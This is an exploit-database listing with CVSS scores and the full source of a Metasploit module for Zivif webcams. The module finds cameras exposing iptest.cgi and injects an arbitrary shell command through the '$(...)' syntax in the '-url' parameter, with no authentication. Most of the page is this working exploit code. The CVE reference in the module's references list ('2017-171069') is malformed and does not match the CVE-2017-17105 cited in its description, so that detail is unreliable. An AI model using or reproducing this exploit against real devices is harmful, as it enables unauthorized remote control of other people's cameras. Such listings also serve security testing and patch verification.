Lucene search

K
0daydb0daydb.com0DAYDB:E7DF80FF23072E138A2AF5534BFCD6B5
HistoryJun 21, 2020 - 9:03 a.m.

Zivif Camera 2.3.4.2103 iptest.cgi Blind Remote Command Execution

2020-06-2109:03:21
0daydb.com
0daydb.com
232

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

This Metasploit module exploits a remote command execution vulnerability in Zivif webcams.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'             => 'Zivif Camera iptest.cgi Blind Remote Command Execution',
      'Description'      => %q{
          This module exploits a remote command execution vulnerability in Zivif
       webcams.  This is known to impact versions prior to and including v2.3.4.2103.
       Exploit was reported in CVE-2017-17105.
      },
      'License'          => MSF_LICENSE,
      'Author'           => [ 'Silas Cutler (p1nk)' ],
      'References'       =>
        [
          [ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],
          [ 'CVE', '2017-171069' ]
        ],
      'Platform'         => 'unix',
      'Targets'          =>
        [
          [ 'Automatic Target', { }]
        ],
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00\x27",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic'
            }
        },
      'DefaultOptions'  =>
        {
          'PAYLOAD'           => 'cmd/unix/generic',
        },
      'Privileged'       => false,
      'DisclosureDate'   => "2017-09-01",
      'DefaultTarget'    => 0))
  end

  def check
    res = send_request_cgi('uri' => normalize_uri('cgi-bin', 'iptest.cgi'))
    unless res
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end
    unless res.code && res.code == 200
      return CheckCode::Safe
    end

    CheckCode::Detected
  end

  def exploit
    print_status("Sending request")
    cmd = datastore['CMD']

    res = send_request_cgi(
      'uri' => normalize_uri('cgi-bin', 'iptest.cgi'),
      'method' => 'GET',
      'vars_get' => {
        'cmd' => "iptest.cgi",
        '-time' => Time.now.to_i,
        '-url' => "$(" + cmd + ")"
      }
    )

    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    if res.code && res.code == 200
      print_good('Command sent successfully')
    else
      fail_with(Failure::UnexpectedReply, 'Unable to send command to target')
    end
  end

end

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

Related for 0DAYDB:E7DF80FF23072E138A2AF5534BFCD6B5